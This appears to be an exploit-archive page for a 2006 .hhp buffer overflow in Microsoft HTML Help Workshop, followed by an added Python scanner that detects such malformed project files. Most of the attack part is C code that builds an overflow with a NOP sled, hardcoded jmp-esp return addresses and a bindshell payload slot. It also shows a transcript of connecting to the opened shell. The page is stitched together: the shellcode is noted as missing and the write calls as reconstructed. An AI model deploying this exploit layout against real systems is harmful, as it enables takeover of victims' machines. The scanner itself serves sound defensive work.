Microsoft HTML Help Workshop - '.hhp' Local Buffer Overflow (1)

Publish Date: 06 Feb 2006
Author: bratax
Microsoft HTML Help Workshop .hhp file Buffer Overflow Exploit
Microsoft HTML Help Workshop Buffer Overflow.
Coded by bratax (
Usage: C:\htmlws\PoC2.exe <outputfile>

C:\htmlws>poc2 new.hhp
File written.
Open with Microsoft Help Workshop to exploit.

C:\htmlws>nc -vv localhost 13579
DNS fwd/rev mismatch: RENEE != localhost
RENEE [] 13579 (?) open
Microsoft Windows XP [versie 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char pre[]=
"Compatibility=1.1 or later\n"
"Compiled file=bratax.chm\n"
"Contents file=";

char end[]=
"Display compile progress=No\n"
"Language=0x813 Dutch (Belgium)\n\n\n";

char shellcode[]=
/* bindshell port 13579 thx to :) */
"";	/* the payload bytes are missing from this copy of the page; left empty */

char overflow[15000];	// 15k just to make sure :)
int main(int argc,char *argv[])
{
	FILE *vuln;
	if(argc == 1)
	{
		printf("Microsoft HTML Help Workshop Buffer Overflow.\n");
		printf("Coded by bratax (\n");
		printf("Usage: %s <outputfile>\n",argv[0]);
		return 0;
	}
	vuln = fopen(argv[1],"w");
	if(vuln == NULL)
	{
		perror("fopen");
		return 1;
	}
	//build overflow buffer here.
	memset(overflow,0x90,sizeof(overflow)); //fill with nops
	memcpy(overflow+272,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  1 of these is
	memcpy(overflow+276,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  enough but was
	memcpy(overflow+280,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  a bit lazy to
	memcpy(overflow+284,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  find out the
	memcpy(overflow+288,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)  correct one :p
	memcpy(overflow+292,"\x5d\x38\x82\x7c",4); //EIP (jmp esp)
	memcpy(overflow+300,shellcode,sizeof(shellcode)); //our shellcode after some nops to land in

	//Write file: the "Contents file=" value is the oversized buffer, then the rest of the project.
	//(the write calls are absent from this copy of the page; reconstructed from the buffers above)
	fwrite(pre,1,sizeof(pre)-1,vuln);
	fwrite(overflow,1,sizeof(overflow),vuln);
	fputc('\n',vuln);
	fwrite(end,1,sizeof(end)-1,vuln);
	fclose(vuln);
	printf("File written.\nOpen with Microsoft Help Workshop to exploit.\n");
	return 0;
}
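From the defender's side, the generated project file is easy to spot: a `.hhp` is an INI-like text file, and the PoC turns the `Contents file=` value into a multi-kilobyte block of raw bytes. The scanner below is an added example (it is not code from this advisory, from bratax, or from Microsoft) that flags key=value lines whose value is implausibly long, contains non-printable bytes, or is a long run of one repeated byte. The 260-byte limit is an assumption (Windows MAX_PATH), not a figure from the page; the sample inputs are constructed here and only model the fields the PoC emits.

```python
"""Heuristic scanner for HTML Help project (.hhp) files (added defensive example)."""
import re
import sys

MAX_VALUE_LEN = 260  # assumption: a path-like value should fit in MAX_PATH
REPEATED_BYTE_RUN = re.compile(rb"(.)\1{15,}", re.DOTALL)  # 16+ identical bytes in a row


def scan_hhp(data: bytes, max_value_len: int = MAX_VALUE_LEN):
    """Return a list of (line_number, key, reasons) for suspicious key=value lines."""
    findings = []
    for lineno, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        # .hhp files are INI-like: [SECTION] headers, ';' comments, key=value lines
        if not line or line.startswith((b"[", b";")) or b"=" not in line:
            continue
        key, value = line.split(b"=", 1)
        reasons = []
        if len(value) > max_value_len:
            reasons.append(f"value is {len(value)} bytes, limit {max_value_len}")
        non_printable = sum(1 for b in value if not (0x20 <= b <= 0x7E or b == 0x09))
        if non_printable:
            reasons.append(f"{non_printable} non-printable bytes in value")
        if REPEATED_BYTE_RUN.search(value):
            reasons.append("long run of one repeated byte (sled-like filler)")
        if reasons:
            findings.append((lineno, key.decode("ascii", "replace"), reasons))
    return findings


def scan_file(path: str):
    """Scan a .hhp file on disk; the file is read as bytes, never decoded."""
    with open(path, "rb") as fh:
        return scan_hhp(fh.read())


# Constructed samples: a benign project file modelled on the fields the PoC emits,
# one whose "Contents file" value is an oversized block of 0x90 bytes, and one
# whose value is merely too long but otherwise ordinary text.
BENIGN_HHP = (
    b"[OPTIONS]\n"
    b"Compatibility=1.1 or later\n"
    b"Compiled file=bratax.chm\n"
    b"Contents file=toc.hhc\n"
    b"Display compile progress=No\n"
    b"Language=0x813 Dutch (Belgium)\n"
)
OVERSIZED_HHP = (
    b"[OPTIONS]\n"
    b"Compatibility=1.1 or later\n"
    b"Compiled file=bratax.chm\n"
    b"Contents file=" + b"\x90" * 300 + b"\n"
    b"Display compile progress=No\n"
)
LONG_ASCII_HHP = b"[OPTIONS]\nContents file=" + b"sub/" * 100 + b"\n"


if __name__ == "__main__":
    targets = sys.argv[1:]
    if targets:
        for path in targets:
            for lineno, key, reasons in scan_file(path):
                print(f"{path}:{lineno}: {key}: {'; '.join(reasons)}")
    else:
        for name, blob in (("benign", BENIGN_HHP), ("oversized", OVERSIZED_HHP)):
            print(name, scan_hhp(blob))
```

Run it with one or more `.hhp` paths to triage files from a mail gateway or a quarantine folder, or with no arguments to see the constructed samples classified. The three checks are deliberately independent: a payload that avoids NOP filler still trips the length check, and a short value stuffed with raw bytes still trips the printability check.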

// [2006-02-06]